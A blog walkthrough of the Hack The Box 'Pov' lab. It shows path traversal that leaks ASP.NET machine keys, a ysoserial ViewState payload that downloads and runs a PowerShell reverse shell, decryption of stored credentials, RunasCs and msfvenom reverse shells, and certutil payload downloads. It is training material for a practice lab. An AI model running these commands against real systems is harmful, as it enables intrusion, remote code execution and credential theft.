Hack The Box - Pov

08 May 2024 . tech . Comments
#tutorial

Reconnaissance and Initial Steps

Nmap

sudo nmap -Pn -A 10.10.11.251

image

echo "10.10.11.251 pov.htb" | sudo tee -a /etc/hosts

image

When I visited port 80 I didn’t find anything of interest except dev subdomain.

image

Directory Brute Force

dirsearch -u http://pov.htb/

image

Subdomain Fuzz

Using ffuf, will check if there is any other subdomains for pov.htb domain.

ffuf -c -ac -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.pov.htb' -u http://pov.htb

image

dev only let’s add that to /etc/hosts

echo "10.10.11.251 dev.pov.htb" | sudo tee -a /etc/hosts

There’s a download button in this page

image

Start the proxy in your burp suite and select the option of intercept is on. After that hit the Download CV Button.

image

In the request, we observe the parameter file=cv.pdf. We can attempt to modify the filename to a more sensitive one, such as /web.config, and then send the request. Upon doing so, a file named web.config is downloaded. This file likely contains valuable information for our investigation.

image

<configuration>
  <system.web>
    <customErrors mode="On" defaultRedirect="default.aspx" />
    <httpRuntime targetFramework="4.5" />
    <machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
  </system.web>
    <system.webServer>
        <httpErrors>
            <remove statusCode="403" subStatusCode="-1" />
            <error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
        </httpErrors>
        <httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
    </system.webServer>
</configuration>

after some google search, I found this hacktrick article : https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter

These vulnerabilities arise when the ViewState mechanism is mishandled or improperly secured in ASP.NET web applications, potentially leading to Remote Code Execution (RCE) attacks. First, we’ll need to acquire the ysoserial.exe tool, which is essential for generating malicious payloads. Next, we’ll create a PowerShell script for a reverse shell and encode it to base64. After installing the script on a Windows VM, we’ll use ysoserial.exe with specific parameters to craft a customized ViewState payload, including encryption and validation keys, path, and the encoded PowerShell script. Finally, we’ll exploit the vulnerability by injecting the customized ViewState payload into the target application. Below are the commands for each step:

  1. Obtain ysoserial.exe tool. https://github.com/NHPT/ysoserial.net/releases/ to your windows virtual machine
  2. go to https://www.revshells.com/ and create a reverse shell payload like showing in the below image and in you kali machine save it as rev.ps1

image

  1. update below command and generate the payload using ysoserial.exe 
    ysoserial.exe -p ViewState -g TextFormattingRunProperties --decryptionalg="AES" --decryptionkey="EnterKey" --validationalg="SHA1" --validationkey="EnterKey" --path="/portfolio/default.aspx" -c "powershell.exe iex (iwr http://ip:8000/rev.ps1 -UseBasicParsing)"

    image

  2. Now let’s go back to our kali machine and open two terminals in one terminal we gonna create python3 http server like below and in the other terminal we are creating netcat listener

Terminal 1:

python3 -m http.server 8000

Terminal 2:

nc -nlvp 6666
  1. now let’s navigate to the http://dev.pov.htb then click the Download CV in and capture the request using burpsuite
  2. Then will paste the code that we created using ysoserial.exe to __VIEWSTATE parameter, and send the request

image

image

image

We are in the shell of sfitz . I got an interesting file in the Documents Folder of sfitz which contains the password of the privileged user alaading

PS C:\Users\sfitz\Documents> type connection.xml

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">  
  <Obj RefId="0">  
    <TN RefId="0">  
      <T>System.Management.Automation.PSCredential</T>  
      <T>System.Object</T>  
    </TN>  
    <ToString>System.Management.Automation.PSCredential</ToString>  
    <Props>  
      <S N="UserName">alaading</S>  
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>  
    </Props>  
  </Obj>  
</Objs>

image

Let’s decrypt this password, see the article for more info: https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx

image

User Flag

I use RunasCs to get access to user alaading. RunasCs is an utility to run specific processes with different permissions than the user’s current logon provides using explicit credentials.

I download RunasCs to my kali vm, then unzip and placed directory where I setup python3 http server.

https://github.com/antonioCoco/RunasCs/releases

┌──(kali㉿kali)-[~]
└─$ ls
rev.ps1 RunasCs.exe

python3 -m http.server 8000

image

now in kali machine will create a netcat listener on port 5555

nc -nlvp 5555

then in victim machine will run RunasCs.exe

.\RunanCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.16.31:5555

image

image

image

Yeeah !!!! we got the user flag.

Root Flag

Looking at the permissions, I found that there is SeDebugPrivilege, which can be directly shuttled with winlogon.

image

(But there is a question here. Why does the powershell generated by RunasCs have SeDebugPrivilege, but cmd does not have SeDebugPrivilege)

image

Use metasploit to change my shell to facilitate process migration. (cmd interaction can be done with certutil.exe’s built-in transmission)

  • note the PID here , we required it later when we do the migration
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.31 LPORT=6666 -f exe > shell.exe

image

started reverse TCP handler on port 6666

image

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.31
set lport 6666
run

so we configure python3 http server on kali machine to host our shell.exe and on the vicitm machine we use certutil.exe download it.

pyhthon3 -m http.server 8000

image

certutil.exe -urlcache -split -f http://10.10.16.31:8000/shell.exe shell.exe

image

Now let’s run the shell.exe

image

image

Me

c0d3cr4f73r is a cybersecurity enthusiast with a passion for red teaming and malware analysis. Based in Dubai, c0d3cr4f73r has extensive experience in offensive security operations. In their free time, they enjoy diving into the latest cybersecurity challenges.